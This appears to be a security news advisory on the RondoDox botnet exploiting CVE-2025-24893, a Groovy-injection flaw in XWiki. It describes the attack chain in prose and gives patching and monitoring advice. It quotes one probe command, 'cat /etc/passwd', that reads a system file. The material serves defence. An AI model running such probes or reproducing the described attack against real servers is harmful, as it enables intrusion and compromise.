A critical remote code execution (RCE) vulnerability CVE-2025-24893 in XWiki Platform is being actively exploited by the emerging RondoDox botnet, with attack traffic growing sharply since early November. The flaw has already been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, which typically signals widespread exploitation in the wild and elevates the urgency for patching in enterprise environments.
RondoDox botnet: rapidly maturing threat targeting internet-exposed systems
The RondoDox botnet was first documented by researchers in mid‑2025 and is attributed to a relatively new threat actor focused on compromising large volumes of internet‑facing devices. According to Fortinet and other vendors, the operators aim to build a distributed infrastructure for monetization and further attacks.
Recent samples analyzed by Trend Micro indicate that RondoDox targets a wide spectrum of devices, including digital and network video recorders (DVR/NVR), IP surveillance systems, and web servers. The botnet leverages dozens of publicly known vulnerabilities, some of which were originally demonstrated at Pwn2Own competitions, where practical exploit chains for popular products are routinely disclosed.
CVE-2025-24893: critical RCE in open-source XWiki collaboration platform
XWiki is a widely used open-source enterprise wiki platform adopted by organizations as a central knowledge base and documentation system. Because it is often deeply integrated into business workflows and internal authentication systems, compromise of XWiki can provide attackers with a convenient pivot point into corporate networks.
The vulnerability CVE-2025-24893 affects XWiki versions prior to 15.10.11 and 16.4.1. It enables a remote, unauthenticated attacker to execute arbitrary code on the server hosting XWiki. In many deployments, the application runs under a dedicated service account; however, misconfigurations or broad privileges can allow attackers to escalate access and gain a high level of control over the underlying host.
Groovy injection via SolrSearch endpoint
Analysis by VulnCheck shows that since 3 November 2025, RondoDox operators have been sending crafted HTTP GET requests to vulnerable XWiki instances. The attacks focus on the SolrSearch endpoint, which supports execution of Groovy code as part of the search functionality.
The malicious requests embed a base64‑encoded Groovy script. Once decoded and executed on the server, this script retrieves a remote shell script that deploys the main RondoDox payload. As a result, the compromised XWiki server is silently enrolled into the botnet and starts communicating with attacker‑controlled command‑and‑control (C2) infrastructure.
Cryptominers and reverse shells on compromised XWiki servers
Beyond botnet enrollment, researchers observe that attackers frequently install cryptocurrency miners on infected systems. This leads to sustained high CPU utilization, degraded performance of business applications, and in some cases service instability or outages, especially on resource‑constrained servers.
In multiple incidents, the operators also attempt to establish a reverse shell—an interactive remote access channel from the server back to the attacker. Such access enables manual command execution, lateral movement across the internal network, data exfiltration, and long‑term persistence even if some malware components are later detected and removed.
Mass scanning for XWiki Groovy injection beyond RondoDox
VulnCheck and other monitoring projects report wide‑scale internet scanning of XWiki installations, not limited to the RondoDox infrastructure. Attackers are leveraging automated tools, including the Nuclei framework, to run templates for Groovy injection and to test simple commands like cat /etc/passwd in order to confirm successful code execution.
At the same time, researchers are detecting Out‑Of‑Band Application Security Testing (OAST) techniques, where exploit success is verified through external interactions such as DNS or HTTP callbacks to attacker‑controlled domains. Such patterns are typical of offensive security scanners, penetration testers, and multiple threat groups, suggesting that CVE-2025-24893 has quickly become part of the standard exploit toolkit.
Organizational risk and practical XWiki hardening measures
The combination of a critical RCE vulnerability in XWiki, automated exploitation by RondoDox, and broad community interest in weaponizing the bug creates several concrete risks: unauthorized access to internal documentation and credentials, abuse of corporate infrastructure for spam, DDoS and cryptomining, and potential staging of further intrusions.
Administrators of XWiki deployments should prioritize the following actions:
1. Patch XWiki immediately. Upgrade to 15.10.11 or 16.4.1 (or newer) where CVE‑2025‑24893 is remediated. Vulnerability exploitation timelines observed across many incidents show that public proof‑of‑concepts are often operationalized by threat actors within days.
2. Reduce internet exposure. Review whether XWiki must be publicly reachable. Where possible, restrict access using VPN, Single Sign‑On (SSO), network ACLs, and allow‑listed IP ranges. Minimizing attack surface significantly lowers the probability of opportunistic compromise.
3. Deploy WAF or reverse proxy protections. Place a Web Application Firewall (WAF) or reverse proxy in front of XWiki to block suspicious requests targeting SolrSearch and patterns of Groovy injection, base64‑encoded payloads, and command‑execution probes.
4. Conduct log and performance analysis. Examine HTTP access logs for anomalous GET requests to search endpoints, Groovy execution errors, and unexpected spikes in CPU load that may indicate cryptominer deployment or scanning.
5. Monitor outbound traffic. Implement network monitoring and egress controls to detect unusual outbound connections to unknown hosts or dynamic DNS domains, which often signal C2 traffic or miner‑pool communication.
Maintaining an up‑to‑date inventory of all internet‑exposed services, tracking high‑priority entries in the CISA KEV catalog, running internal scans with tools such as Nuclei, and regularly backing up XWiki data with tested restore procedures are essential defensive practices. The exploitation of CVE‑2025‑24893 by RondoDox demonstrates that corporate wiki platforms are part of critical infrastructure, not ancillary systems. Organizations that move quickly to patch, harden access, and continuously monitor their XWiki environments will substantially reduce the likelihood of compromise and prevent their resources from being absorbed into criminal botnet ecosystems.
